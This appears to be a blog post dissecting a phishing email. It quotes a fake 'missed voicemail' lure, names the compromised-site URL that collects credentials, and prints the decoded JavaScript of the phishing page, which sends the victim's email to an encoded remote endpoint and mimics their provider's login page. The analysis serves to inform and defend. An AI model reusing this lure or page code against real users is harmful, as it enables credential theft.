You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021 - SPAM WARNING!!

You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021  - SPAM WARNING

You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021  - SPAM WARNING!!

 

Hello Recipient,

Your cal­ler le­ft you 3 v­o­ic­em­ai­l me­s­sa­ges.

V­oi­ce - Mes­sa­ge for: recipient@domain.suffix (MI­SS­ED CA­LL­S)

CAL­LER NUM­BER : +44 335970973

Pl­ea­se do­w­nlo­ad at­ta­chm­ent to li­ste­n to Me­ss­age

Mes­sa­ges wi­ll au­to dele­te in 2 h­ou­rs

As you can see it appears to just record the email address:

The site to which your credentials will be sent appears to be: http://mtu.edu.ng/wp-content/uploads/2020/9/9/h.php encrypted with Base64 in the JavaScript code on the site:

 Then their html code in Base64 reads:

<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"
integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="
crossorigin="anonymous"
></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.8/FileSaver.min.js"
integrity="sha256-FPJJt8nA+xL4RU6/gsriA8p8xAeLGatoyTjldvQKGdE="
crossorigin="anonymous"
></script>
</head>
<body>
<div id="capture" style="padding: 10px; color: black"></div>
<script type="text/javascript">
try {
var email = atob(e);
} catch (e) {
var email = e;
}
var domain = e.split("@");

setTimeout(() => {
loadPages(
eur +
"?e=" +
e +
"&ep=" +
ep +
"&en=" +
btoa(e) +
"&eu=" +
domain[1]
);
}, 2000);

function loadPages(load) {

var testURL = load;

$.ajax({
url: atob(hp),
method: "POST",
data: { url: testURL },
success: function (response) {
response = response.replace(/href="\//g, 'href="' + testURL + "/");
response = response.replace(/src="\//g, 'src="' + testURL + "/");
response = response.replace(
/content="\//g,
'content="' + testURL + "/"
);

$("#capture").html(response);
// console.log(response);

},
});
}

</script>
</body>
</html>

Comments (1) -

Add comment